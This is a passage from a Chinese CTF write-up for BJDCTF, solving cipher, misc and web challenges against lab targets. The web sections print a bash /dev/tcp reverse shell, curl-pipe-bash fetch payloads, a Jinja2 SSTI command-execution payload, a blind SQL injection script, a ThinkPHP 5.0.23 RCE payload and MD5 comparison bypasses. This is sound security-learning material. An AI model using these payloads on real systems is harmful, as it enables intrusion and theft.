• BJDCTF Online
• Write Up
• 挑食的小蛇
• 小姐姐
• A Beautiful Picture
• 最简单的MISC
• Imagin - 开场曲
• Real EasyBaBa
• 圣火昭昭
• Easy Baba
• 签到
• 燕言燕语
• 老文盲了
• cat flag
• 灵能精通
• Y1nglish
• Schrödinger
• duangShell
• 假猪套天下第一
• fake google
• 简单注入
• old-hack
• Easy MD5

</div> 对应解密之后，可以得到 flag。

BJD{IMKNIGHTSTEMPLAR}

Y1nglish

这题我可喜欢了，下面我来分析一波。

首先根据提示得知这是一篇完全可读的英文文章，所以大小写不做特别区分。

再者，根据前面题目的经验，MIH 应该对应 BJD，因此得到 M => B、I => J、H => D。

Izcztkok 这个词在句子中首字母大写，因此它是一个名词，而 z 在名词前单独出现，I 对应的 J 是辅音音素的字母，因此，名词前的不定冠词应该是 a，因此，Z => A。

Q 字母在单独出现的时候从来没有小写过，且多位于句首，因此判定其是主语 I，因此 Q => I。

zd 出现在了冠词前，由 a 开头的二字母常用词有两个，as 和 at（因为没有 Q zd 的结构排除 am 这种可能）。但是观察到 pk qo 部分的半句，有两种情况，从句和普通句，但是因为除了 as 没有其他的二字母引导词（p 也不可能是 a)，所以按普通句处理。因此， pk 应该是一个主语，而 qo 作为 i 开头的二字母谓语，就是 is 了，因此，O => S。所以 zd 不可能是 as，因此 D => T。

ds，以 t 字母开头的二字母常用单词只有 to，因此 S => O。

qt，排除了 is, it 这些二字母单词，剩下的以 i 开头的常用词就剩下 in 了。因此 T => N。

由前面的推断已知 pk 是个代词，所以 pk nzo 中的 nzo 一定是个谓语，结合上述的结果，可得这个单词是 was。所以 N => W。

med 后面出现了代词 pk 且出现在断句处，因此 med 是个连词，结合上述可得 med 是 but，因此 E => U。

能够构成 sef 这个结构的单词并不多，解出了前两个字母，只有 our, out 这两种可能，而 D => T，因此 sef 极大可能是 our，因此 F => R。

因为 qo 是 is，zth 是 and，所以，推测 usf 是个介词，以 or 结尾的三字母介词，极大可能是 for。因此 U => F。

vssh 出现在了冠词后，且其后还有一个词，紧接着是断句，因此它可能是个形容词，而以 _ood 结尾的形容词，极大可能是 good，因此，V => G。

ufsl 这个词出现在了两个名词中间，且解出几个字母为 fro_，很容易想到 L => M。

vkdo 出现在代词 Pk 后，因此考虑它是个谓语动词，结合解出来的几个字母，容易拼合出 gets，因此 K => E。因此，Pk 第三人称代词得到验证，Pk 是 He，因此，P => H。

mzoqa 中拼出大部分字母之后容易得出 A => C。

Qu wse 中的 Qu 拼出为 If，后面的 zfk 拼出为 are，所以句子缺少主语，推测为代词，以 _ou 结尾，因此得出 wse 是 you，因此，W => Y。

qo lzqtbw usf 拼出 is main_y for，容易得出 B => L。

dwcko 拼出 ty_es，容易得出 C => P。

进行到这里，筛选一下没有被匹配的字符，还剩下 KQVXZ 五个字符。

uqjk 拼出 fi_e，从上面选一个，拼出 five，因此，J => V。

剩下几个字母在文章中没有出现，先对照着把整篇文章解密再想办法。（下附解密文章[错误已更正]）

Welcome to our competition. Our competition is mainly for freshmen and sophomores. There are five types of topics in this competition, each of which is very basic. If you are interested in network security, welcome to participate. Let me tell you a story.
I was having dinner at a restaurant when Harry Steele came in, he is a Japanese from Japan but now he is not living in Japan, maybe Harry isn't a Japanese name but he is really a Japanese. Harry worked in a lawyer's office years ago, but he is now working at a bank. He gets a good salary, but he always borrows money from his friends and never pays it back. Harry saw me and came and sat at the same table. He has never borrowed money from me. While he was eating, I asked him to lend me &2. To my surprise, he gave me the money immediately. 'I have never borrrowed any money from you,' Harry said,'so now you can pay for my dinner!' Now i will give you what you want.BJD{pyth0n_Brut3_f0rc3_oR_quipquip_AI_Cr4ck}

更正错误时，根据文意将 wory 改作 work，因此 Y => K。

flag 中的 geqc 解密作 quip 比较合理（善用搜索引擎，quipqiup - cryptoquip and cryptogram solver）因此，G => Q。

至此，文章和 flag 都已经解密完毕，下附对照表。（其中 R、X 因为没有出现，无法解出）

ABCDEFGHIJKLMNOPQRSTUVWXYZ
CLPTURQDJVEMBWSHI ONFGY KA

BJD{pyth0n_Brut3_f0rc3_oR_quipquip_AI_Cr4ck}

Schrödinger

Cookie

打开页面之后是一个“Login Fucker”。随手先 confirm 一个，然后看完一手说明去看了这个页面的源代码，找到了 test.php 这个页面，疯狂尝试注入然后看了一手页面源码发现根本没有可以回显的地方。 没错，比赛的时候试了很久注入才发现是个固定的 alert，然后就没思路了。

回到最开始的页面发现了有个 Cookie 很奇怪，复制下来 Base64 一顿怼之后可以发现是 user = 提交时间戳。 可能是平时奇怪的代码写多了，觉得这个并没有什么特别的，于是比赛时就放过它了。（就是这样卡了差不多一天）

其实应该是把 test.php 的 url confirm 进去，然后 document.cookie="dXNlcg=" 把这个 Cookie 置空再刷新就能达到 99%+ 的成功率，然后再 check 一下就能拿到下一步线索。

Burst successed! The passwd is av11664517@1583985203.

一看就知道是 Bilibili 的 av 号，找到对应视频再按时间戳找评论就能拿到 flag。

BJD{Quantum_Mechanics_really_Ez}

duangShell

Reverse Shell

打开页面之后根据提示拿到了 .index.php.swp 这个文件。比赛的时候踩了个坑，直接用 Windows 的记事本打开了，然后只拿到一半源码，结果根本审计不出来（少了最上面的一半 if ），当时还以为也是考点来着。正确的姿势应该是找个 vim 然后用 vim -r 恢复文件来拿到源码。

<body>
    <center><h1>珍爱网</h1></center>
</body>
</html>
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
    die("where is P3rh4ps's girl friend ???");
} else {
    $girl = $_POST['girl_friend'];
    if (preg_match('/\>|\\\/', $girl)) {
        die('just girl');
    } else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
    } else {
        //duangShell~~~~
        exec($girl);
    }
}

稍微审计了一波，发现很多命令都直接滤掉了，但是题目叫 shell。于是搜了一波反弹shell，找到了这个。但是还少了一点东西，就是如何把反弹 shell 的命令传上去，这里找到了两条可行指令，但是靶机没得 wget，所以用 curl。首先把指令写在一个文件里，这里我写在 lemonshell.txt 中，内容如下。这里的端口和 IP 可以在终端中用 ifconfig 查询。

bash -i >& /dev/tcp/174.1.93.139/8210 0>&1

然后再用 nc -lvp 8210 监听 8210 端口。回到网页端，审计代码可以得出是要传入一个 girl_friend 的参数，其在一系列过滤之后被执行。所以 POST 参数可以这样写。

//When there is wget
girl_friend=wget –q –O 174.1.93.139/lemonshell.txt|bash

//When there is no wget, use curl
girl_friend=curl 174.1.93.139/lemonshell.txt|bash

如果成功了就能在监听端口的终端看到回显，大概像这样。

connect to [174.1.93.139] from 6005-d5c879a9-8350-4539-b26c-f102bcd90b88.1.8tv0l2tbgn7e5fs3p1k8rfnny.ctfd_swarm [174.1.93.128] 43370
bash: cannot set terminal process group (170): Not a tty
bash: no job control in this shell
bash-4.4$

然后就是找 flag 啦。首先一手 cat /flag 然后没有拿到 flag。于是开始 find / -name flag，一开始没有找到，因为一堆 Permission Denied 我以为没得。然后堆堆提醒我说 find 得等比较久。于是等了一会儿，find 返回了这个 /etc/demo/P3rh4ps/love/you/flag，于是顺利拿到 flag。

flag{ed2e8ade-b5d4-4164-8154-6432592a8466}

假猪套天下第一

Headers

一打开页面，一股精致的画风扑面而来(x 随手来了个账号密码登录，发现居然成了，到了 profile.php，然后看了一手源码，发现啥都没有，再看了一手 Cookie 也没有发现，请求头也没有东西。（陷入僵局）

想到浏览器没办法抓 302 啥的，就打开了 Fiddler，顺手抓了一波登录的包，在跳转页面的响应源码发现了点东西，出现了个 L0g1n.php。于是把它打开，页面提示错误，顺手看了波源码，发现要改 Cookie。照着前面的套路算了一下符合要求的时间的时间戳，用 document.cookie="time=4740774808" 改完之后刷新。跟着页面提示设置一系列 Header。

User-Agent: Contiki/1.0 (Commodore 64; http://dunkels.com/adam/contiki/)
Cookie: time=4740774808
via: y1ng.vip
from: root@gem-love.com
referer: gem-love.com
x-real-ip: 127.0.0.1

这样之后会得到 Sorry, even you are good at http header, you're still not my admin. Althoungh u found me, u still dont know where is flag 的提示，于是看了一波 Fiddler 上的响应，发现了一段注释。

<!--ZmxhZ3s1NmVjMTNmZS03Mzk1LTRlY2MtYmIxYS0zMmNjZTQ1NzNjZGZ9Cg==-->

将它 Base64 编码转换之后得到 flag。

flag{56ec13fe-7395-4ecc-bb1a-32cce4573cdf}

fake google

SSTI

打开页面之后随手输了个 P3，得到的结果是 P3's girlfirend is : P3。随手看了看网页源代码，发现了 hint <!--ssssssti & a little trick -->，然后尝试着构造了个 {{5 * 7}}，得到了 35 的预期结果，然后再构造了个 {{6 * '7'}} 得到了 777777 的预期结果，所以应该是 Twig/Jinja2 类型的模板。

先构造一波参数找一下 flag 的位置，.../qaq?name={{ config.class.init.globals['os'].popen('find / -name flag').read() }}，得到的返回值显示 flag 就在根目录。于是直接构造 cat /flag 就能得到 flag。

flag{39648fcb-2a51-47ac-b651-8aa0d5ddecef}

堆堆跟我说过这题还有个关键字过滤的精髓操作（可惜在 BUUCTF 上没作用了），于是我在这里模拟一下绕过过滤的操作，即将过滤的字符用其他字符替换，这里以 flag => LEMON 操作。我找到了一个很好用的替换指令：sed。因此，payload 可以这样写。

.../qaq?name={{ config.__class__.__init__.__globals__['os'].popen('cat /flag|sed "s/flag/LEMON/g"').read() }}

得到的 flag 会变成这样，就解决了过滤的问题。

LEMON{39648fcb-2a51-47ac-b651-8aa0d5ddecef}

简单注入

SQL Injection

这题比赛的时候疯狂试了好久，我记得当时好像说不要扫目录来着，结果就没想特殊文件，其实 robots.txt 里面藏着 hint.txt 然后有个提示直接给出了查询的语句 select * from users where username='$_POST["username"]' and password='$_POST["password"]';。但是试了很久发现完全没得回显，除了固定的那一句（说到这里，我想鲨了 HackBar 插件）。查了一波之后知道了反斜杠的套路，然后使用 /**/ 代替空格构造了 username=admin\\&password=or/**/ascii(substr(password,1,1))>1# 这样的请求，用某在线工具发送请求之后得到了不一样的结果，于是就上了一波盲注脚本。

using System;
using Flurl.Http;
namespace CTFdo {
    internal class Program {
        public static void Main(string[] args){
            const int BEGIN_ASCII = 32;
            const int END_ASCII = 127;
            const string URL = "URL_HERE";
            int position = 0;
            string result = "";
            while (true){
                position++;
                int _begin = BEGIN_ASCII;
                int _end = END_ASCII;
                while (_begin < _end){
                    int _mid = (_begin + _end) / 2;
                    string data = "username=admin\\&password=or/**/ascii(substr(password," + position + ",1))>" + _mid + "#";
                    string _result = URL.WithHeaders(new {Content_Type="application/x-www-form-urlencoded"})
                                        .PostStringAsync(data).ReceiveString().Result;
                    if (_result.Contains("BJD needs to be stronger")){
                        _begin = _mid + 1;
                    }
                    else{
                        _end = _mid;
                    }
                }
                if (_begin != BEGIN_ASCII && _end != END_ASCII){
                    result += (char)_begin;
                }
                else{
                    break;
                }
            }
            Console.WriteLine(result);
        }
    }
}

一番操作得到了密码 OhyOuFOuNdit，登录之后得到 flag。

flag{12781fb2-7b4d-48ff-8540-1cc663189d9a}

old-hack

打开页面之后发现 ThinkPHP，这波提示十分明显。于是一套操作，发现报错了，但是拿到了具体的版本号 5.0.23。一顿搜索之后找到了命令执行的 payload。于是抄一波作业，向 .../index.php?s=captcha POST _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls 成功发现根目录的 flag。于是再构造一波 cat /flag 就得到了 flag。 这里顺带贴一波参考资料 One Two

flag{bcd83ed3-ec7d-4397-9e2c-d06a4245f0e6}

Easy MD5

氦，这题其实只有一开始的点我是不知道的。ffifdyop 这个字符串被 MD5 摘要之后 hex 转 ASCII 可以构成一个 or，因此可以达成正确的结果。过了这一个点之后可以在下一个页面的源码种找到一段注释。

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

这波直接构造 a[]=1&b[]=2 就能通过。第三个页面的 if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])) 也可用一样的方法绕过，从而得到 flag。

BJD{Md_five_is_fun}